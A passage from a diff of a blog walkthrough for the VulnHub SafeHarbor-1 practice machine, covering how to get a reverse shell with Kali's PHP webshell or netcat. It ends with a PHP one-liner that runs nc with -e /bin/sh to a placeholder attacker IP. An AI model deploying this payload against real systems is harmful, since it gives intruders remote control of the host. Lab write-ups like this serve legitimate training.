sharathunni/haxorhead-blog/_posts/2019-10-15-VulnHub-Walkthrough-SafeHarbor-1.md

 ![command_execution](assets/Vulnhub-walkthrough-safeharbor1/Vulnhub-walkthrough-safeharbor1_4.png)

-Let's go ahead and get a reverse shell, using the default one available on Kali (/usr/share/webshells/php/php-reverse-shell.php) or you can achieve the same using one of the one liners below.
+Let's go ahead and get a reverse shell, using the default one available on Kali (/usr/share/webshells/php/php-reverse-shell.php) or you can achieve the same using a one liner shown below.
 I did some basic checks to verify what shells are available and if netcat is available.
 Luckily, the version supports "-e" option.
 If that option is not supported you can use the workaround mentioned here: [Link to another page](https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/)

 ```php
 <?php system('nc attacker_ip port -e /bin/sh'); ?>